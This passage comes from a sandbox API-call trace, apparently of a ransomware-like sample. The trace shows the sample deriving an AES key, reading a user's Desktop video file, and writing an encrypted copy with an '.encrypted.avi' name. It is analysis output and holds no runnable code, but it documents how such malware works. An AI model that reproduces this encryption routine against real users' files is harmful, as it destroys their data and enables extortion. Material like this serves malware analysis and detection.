wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0031.378] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0031.378] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da368 [0031.378] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1b48 [0031.379] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c970 [0031.379] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da1e8 [0031.379] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da328 [0031.379] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x30) returned 0x7b4440 [0031.379] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0031.379] PeekMessageW (in: lpMsg=0x6ae1d4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae1d4) returned 0 [0031.379] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da328 [0031.379] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da378 [0031.379] CharUpperBuffW (in: lpsz="__CRYPT_CONTEXT", cchLength=0xf | out: lpsz="__CRYPT_CONTEXT") returned 0xf [0031.379] PeekMessageW (in: lpMsg=0x6ae1d4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae1d4) returned 0 [0031.379] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da328 [0031.379] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da378 [0031.379] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0031.379] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c748 [0031.379] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da328 [0031.379] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da378 [0031.379] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c8b0 [0031.379] CryptDeriveKey (in: hProv=0x7d5bb8, Algid=0x660e, hBaseData=0x7c2100, dwFlags=0x1, phKey=0x6ae208 | out: phKey=0x6ae208*=0x7c2280) returned 1 [0031.379] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da3f8 [0031.379] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x214) returned 0x7b85a8 [0031.379] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x18) returned 0x7ae928 [0031.379] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c748 [0031.379] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c8b0 [0031.379] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8896a0 [0031.379] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da3b8 [0031.379] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0031.379] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da3f8 [0031.379] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20a) returned 0x7b8158 [0031.379] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da1f8 [0031.379] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0031.379] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0031.379] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da3f8 [0031.379] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da1f8 [0031.380] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0031.380] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da3f8 [0031.380] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0031.380] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da3f8 [0031.380] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da1f8 [0031.380] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x18) returned 0x7ae9a8 [0031.380] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0031.380] PeekMessageW (in: lpMsg=0x6ae344, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae344) returned 0 [0031.380] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da1f8 [0031.380] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da368 [0031.380] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0031.380] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c898 [0031.380] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da1f8 [0031.380] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da368 [0031.380] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cbf8 [0031.380] CryptDestroyHash (hHash=0x7c2100) returned 1 [0031.380] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da398 [0031.380] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x214) returned 0x7b8158 [0031.380] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da1e8 [0031.380] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c898 [0031.380] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cbf8 [0031.380] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889628 [0031.380] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da1f8 [0031.380] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0031.380] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da398 [0031.380] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1b48 [0031.380] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889778 [0031.380] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da1e8 [0031.380] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0031.381] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da408 [0031.381] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20a) returned 0x7b85a8 [0031.381] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da138 [0031.381] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0031.381] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0031.381] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0031.381] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da408 [0031.381] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b16c0 [0031.381] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8897c0 [0031.381] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da138 [0031.381] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889c10 [0031.381] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\tPM9533uYXhl8C6vtf\\tjNI\\lK15Vz5k\\b9ol1.avi" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\tpm9533uyxhl8c6vtf\\tjni\\lk15vz5k\\b9ol1.avi"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x128 [0031.381] SetFilePointerEx (in: hFile=0x128, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0031.381] SetFilePointerEx (in: hFile=0x128, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x6ae940 | out: lpNewFilePointer=0x0) returned 1 [0031.381] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1788 [0031.381] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c7f0 [0031.381] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da198 [0031.381] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0031.381] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da408 [0031.381] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20a) returned 0x7b85a8 [0031.381] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da228 [0031.381] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0031.381] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0031.381] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da408 [0031.381] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b16c0 [0031.381] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ce38 [0031.381] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da228 [0031.381] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8897c0 [0031.382] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\tPM9533uYXhl8C6vtf\\tjNI\\lK15Vz5k\\b9ol1.encrypted.avi" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\tpm9533uyxhl8c6vtf\\tjni\\lk15vz5k\\b9ol1.encrypted.avi"), dwDesiredAccess=0xc0000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x140 [0031.382] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1918 [0031.382] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cb68 [0031.382] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da178 [0031.382] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0031.382] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da408 [0031.382] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20a) returned 0x7b85a8 [0031.382] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da258 [0031.382] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0031.382] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0031.382] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x38) returned 0x7c2200 [0031.382] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0031.382] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da408 [0031.382] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b16c0 [0031.382] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889c10 [0031.382] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da258 [0031.382] SetFilePointerEx (in: hFile=0x128, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x6ae990 | out: lpNewFilePointer=0x0) returned 1 [0031.382] ReadFile (in: hFile=0x128, lpBuffer=0x88ffb0, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x6ae9b8, lpOverlapped=0x0 | out: lpBuffer=0x88ffb0*, lpNumberOfBytesRead=0x6ae9b8*=0xa715, lpOverlapped=0x0) returned 1 [0031.385] ReadFile (in: hFile=0x128, lpBuffer=0x88ffb0, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x6ae9b8, lpOverlapped=0x0 | out: lpBuffer=0x88ffb0*, lpNumberOfBytesRead=0x6ae9b8*=0x0, lpOverlapped=0x0) returned 1 [0031.386] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0031.386] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da258 [0031.386] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b16c0 [0031.386] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ce38 [0031.386] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da2a8 [0031.386] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da1c8 [0031.386] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0xa715) returned 0x935008 [0031.386] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0031.386] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da258 [0031.386] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da1c8 [0031.386] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x18) returned 0x7ae988 [0031.386] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0031.386] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da258 [0031.386] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da1c8 [0031.386] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x30) returned 0x7b4440 [0031.386] CharUpperBuffW (in: lpsz="_CRYPT_ENCRYPTDATA", cchLength=0x12 | out: lpsz="_CRYPT_ENCRYPTDATA") returned 0x12 [0031.387] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0031.387] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da1e8 [0031.387] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0031.387] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b19b8 [0031.387] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c8f8 [0031.387] CharUpperBuffW (in: lpsz="__CRYPT_GETCALGFROMCRYPTKEY", cchLength=0x1b | out: lpsz="__CRYPT_GETCALGFROMCRYPTKEY") returned 0x1b [0031.387] PeekMessageW (in: lpMsg=0x6ae324, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae324) returned 0 [0031.387] CharLowerBuffW (in: lpsz="uint;dword", cchLength=0xa | out: lpsz="uint;dword") returned 0xa [0031.387] PeekMessageW (in: lpMsg=0x6ae324, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae324) returned 0 [0031.387] PeekMessageW (in: lpMsg=0x6ae324, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae324) returned 0 [0031.387] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0031.387] PeekMessageW (in: lpMsg=0x6adcd4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6adcd4) returned 0 [0031.387] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0031.387] CryptGetKeyParam (in: hKey=0x7c2280, dwParam=0x7, pbData=0x7da328, pdwDataLen=0x6adcf0, dwFlags=0x0 | out: pbData=0x7da328*=0x660e, pdwDataLen=0x6adcf0*=0x4) returned 1 [0031.387] PeekMessageW (in: lpMsg=0x6ae324, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae324) returned 0 [0031.387] PeekMessageW (in: lpMsg=0x6ae324, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae324) returned 0 [0031.387] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0031.387] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0031.387] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0031.387] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0031.387] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7c2300 | out: hHeap=0x770000) returned 1 [0031.387] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0031.387] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0031.387] CharUpperBuffW (in: lpsz="_CRYPT_STARTUP", cchLength=0xe | out: lpsz="_CRYPT_STARTUP") returned 0xe [0031.387] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1c88 | out: hHeap=0x770000) returned 1 [0031.388] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da378 | out: hHeap=0x770000) returned 1 [0031.388] PeekMessageW (in: lpMsg=0x6ae5e4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae5e4) returned 0 [0031.388] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0031.388] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b4440 | out: hHeap=0x770000) returned 1 [0031.388] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1f8 | out: hHeap=0x770000) returned 1 [0031.388] PeekMessageW (in: lpMsg=0x6ae1c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae1c4) returned 0 [0031.388] PeekMessageW (in: lpMsg=0x6ae5e4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae5e4) returned 0 [0031.388] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7c2300 | out: hHeap=0x770000) returned 1 [0031.388] PeekMessageW (in: lpMsg=0x6ae5e4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae5e4) returned 0 [0031.388] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTINC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTINC") returned 0x13 [0031.388] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b4440 | out: hHeap=0x770000) returned 1 [0031.388] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da378 | out: hHeap=0x770000) returned 1 [0031.388] PeekMessageW (in: lpMsg=0x6ae38c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae38c) returned 0 [0031.388] PeekMessageW (in: lpMsg=0x6ae38c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae38c) returned 0 [0031.388] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ab530 | out: hHeap=0x770000) returned 1 [0031.388] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c970 | out: hHeap=0x770000) returned 1 [0031.388] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0031.388] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b4440 | out: hHeap=0x770000) returned 1 [0031.388] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da358 | out: hHeap=0x770000) returned 1 [0031.388] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0031.389] CryptEncrypt (in: hKey=0x7c2280, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x6ae220*=0xa715, dwBufLen=0x0 | out: pbData=0x0*, pdwDataLen=0x6ae220*=0xa720) returned 1 [0031.389] CharLowerBuffW (in: lpsz="byte[42785]", cchLength=0xb | out: lpsz="byte[42785]") returned 0xb [0031.389] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0031.389] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b4440 | out: hHeap=0x770000) returned 1 [0031.389] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1d8 | out: hHeap=0x770000) returned 1 [0031.390] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0031.390] CryptEncrypt (in: hKey=0x7c2280, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x954568*, pdwDataLen=0x6ae220*=0xa715, dwBufLen=0xa720 | out: pbData=0x954568*, pdwDataLen=0x6ae220*=0xa720) returned 1 [0031.390] CharUpperBuffW (in: lpsz="_CRYPT_SHUTDOWN", cchLength=0xf | out: lpsz="_CRYPT_SHUTDOWN") returned 0xf [0031.390] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1be8 | out: hHeap=0x770000) returned 1 [0031.390] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da338 | out: hHeap=0x770000) returned 1 [0031.390] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTDEC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTDEC") returned 0x13 [0031.390] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b4440 | out: hHeap=0x770000) returned 1 [0031.390] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da338 | out: hHeap=0x770000) returned 1 [0031.390] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0031.390] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b4440 | out: hHeap=0x770000) returned 1 [0031.390] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1d8 | out: hHeap=0x770000) returned 1 [0031.395] CharUpperBuffW (in: lpsz="_CRYPT_DESTROYKEY", cchLength=0x11 | out: lpsz="_CRYPT_DESTROYKEY") returned 0x11 [0031.395] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b4440 | out: hHeap=0x770000) returned 1 [0031.395] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da258 | out: hHeap=0x770000) returned 1 [0031.396] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0031.396] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b4440 | out: hHeap=0x770000) returned 1 [0031.396] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da2a8 | out: hHeap=0x770000) returned 1 [0031.396] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0031.396] CryptDestroyKey (hKey=0x7c2280) returned 1 [0031.396] CharUpperBuffW (in: lpsz="_CRYPT_SHUTDOWN", cchLength=0xf | out: lpsz="_CRYPT_SHUTDOWN") returned 0xf [0031.396] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1670 | out: hHeap=0x770000) returned 1 [0031.396] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1c8 | out: hHeap=0x770000) returned 1 [0031.396] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTDEC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTDEC") returned 0x13 [0031.396] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b4440 | out: hHeap=0x770000) returned 1 [0031.396] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1c8 | out: hHeap=0x770000) returned 1 [0031.396] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0031.396] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b4440 | out: hHeap=0x770000) returned 1 [0031.396] HeapFree (in: hHeap=0x770000, dwFlags=0x0, 